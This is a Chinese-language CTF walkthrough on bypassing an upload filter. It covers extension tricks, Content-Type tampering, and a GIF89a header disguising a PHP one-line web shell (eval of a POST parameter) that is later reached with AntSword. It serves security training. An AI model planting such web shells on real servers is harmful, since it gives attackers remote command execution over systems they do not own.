首先我们先看到页面内容:
是一个文件上传,可能会是白名单绕过,也有可能会是黑名单绕过。
先上传一个php文件看看回显
回显提示说我们没有上传一张图片,一般的来说,上传图片或者别的什么,有可能就是白名单绕过了。
我们上传一个木马,然使用BP抓取一下我们上传的数据包
看到了content-type我觉得可以尝试修改一下进行绕过
但是页面却回显说NOT PHP,也即是说,我们不能上传以php为后缀的文件,我们这里想到了php3,phtml,Php等等
我们一一尝试一下。
当我们把后缀修改为php3的时候,却回显说NOT PHP3
然后我们尝试一下phtml
回显说是我的内容里面不能有<?
也就是说普通的一句话木马不能在这里使用了,这里是这样的,我们可以使用js+php进行bypass
payload1
<script language='php'>@eval($_POST['cmd']);</script>
但是回显还是说不能上传,意思是不是一个图片,这里我们可以使用gif文件头欺骗来进行绕过
payload:
GIF89a <script language='php'>@eval($_POST['cmd']);</script>
然后我们修改到我们的数据包里面:
发现上传成功。
接下来就是需要找到我们这个文件的位置,然后使用蚁剑进行连接就可以了。
在找文件目录的时候这里是需要一些运气的或者说是经验,我们可以猜测一下目录位置是/upload/访问一下看看
发现确实是这样,然后我们就可以这届找到我们的文件,然后进行连接了。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。